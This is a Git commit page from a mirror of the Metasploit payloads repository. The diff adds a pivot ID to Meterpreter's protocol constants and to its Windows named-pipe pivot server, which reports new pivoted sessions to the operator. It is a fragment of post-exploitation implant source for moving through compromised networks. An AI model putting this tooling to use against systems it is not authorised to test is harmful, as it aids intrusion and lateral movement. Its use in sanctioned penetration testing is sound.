github/metasploit-payloads
1
Fork 0
mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00
Code Releases Activity

Add support for the pivot ID

Browse Source
This commit is contained in:
OJ 2017-07-11 19:43:23 +10:00
parent 6d2582102d
commit cba5e86ac2
No known key found for this signature in database
GPG Key ID: D5DC61FB93260597
2 changed files with 14 additions and 5 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
c/meterpreter/source/common/core.h
View File

@ -172,9 +172,10 @@ typedef enum
TLV_TYPE_ENC_SYM_KEY = TLV_VALUE(TLV_META_TYPE_RAW, 553), ///! Represents and RSA-encrypted symmetric key
// Pivots
TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the data to be staged on new connections.
TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 651), ///! Represents the size of the data to be staged on new connections.
TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 652), ///! Represents named pipe name.
TLV_TYPE_PIVOT_ID = TLV_VALUE(TLV_META_TYPE_RAW, 650), ///! Represents the id of the pivot listener
TLV_TYPE_PIVOT_STAGE_DATA = TLV_VALUE(TLV_META_TYPE_RAW, 651), ///! Represents the data to be staged on new connections.
TLV_TYPE_PIVOT_STAGE_DATA_SIZE = TLV_VALUE(TLV_META_TYPE_UINT, 652), ///! Represents the size of the data to be staged on new connections.
TLV_TYPE_PIVOT_NAMED_PIPE_NAME = TLV_VALUE(TLV_META_TYPE_STRING, 653), ///! Represents named pipe name.
TLV_TYPE_EXTENSIONS = TLV_VALUE(TLV_META_TYPE_COMPLEX, 20000), ///! Represents an extension value.
TLV_TYPE_USER = TLV_VALUE(TLV_META_TYPE_COMPLEX, 40000), ///! Represents a user value.

12
c/meterpreter/source/server/win/server_pivot_named_pipe.c
View File

@ -15,6 +15,7 @@ typedef struct _NamedPipeContext
OVERLAPPED read_overlap;
OVERLAPPED write_overlap;
char name[PIPE_NAME_SIZE];
GUID pivot_id;
Remote* remote;
HANDLE pipe;
BOOL connecting;
@ -466,8 +467,9 @@ static DWORD server_notify(Remote* remote, LPVOID entryContext, LPVOID threadCon
guid.Data2 = htons(guid.Data2);
guid.Data3 = htons(guid.Data3);
Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_new");
packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(GUID));
Packet* notification = packet_create(PACKET_TLV_TYPE_REQUEST, "core_pivot_session_new");
packet_add_tlv_raw(notification, TLV_TYPE_SESSION_GUID, (LPVOID)&guid, sizeof(guid));
packet_add_tlv_raw(notification, TLV_TYPE_PIVOT_ID, (LPVOID)&serverCtx->pivot_id, sizeof(serverCtx->pivot_id));
packet_transmit(serverCtx->remote, notification, NULL);
PivotContext* pivotContext = (PivotContext*)calloc(1, sizeof(PivotContext));
@ -554,6 +556,12 @@ DWORD request_core_pivot_add_named_pipe(Remote* remote, Packet* packet)
namedPipeServer = ".";
}
LPBYTE pivotId = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_ID);
if (pivotId != NULL)
{
memcpy(&ctx->pivot_id, pivotId, sizeof(ctx->pivot_id));
}
LPVOID stageData = packet_get_tlv_value_raw(packet, TLV_TYPE_PIVOT_STAGE_DATA);
ctx->stage_data_size = packet_get_tlv_value_uint(packet, TLV_TYPE_PIVOT_STAGE_DATA_SIZE);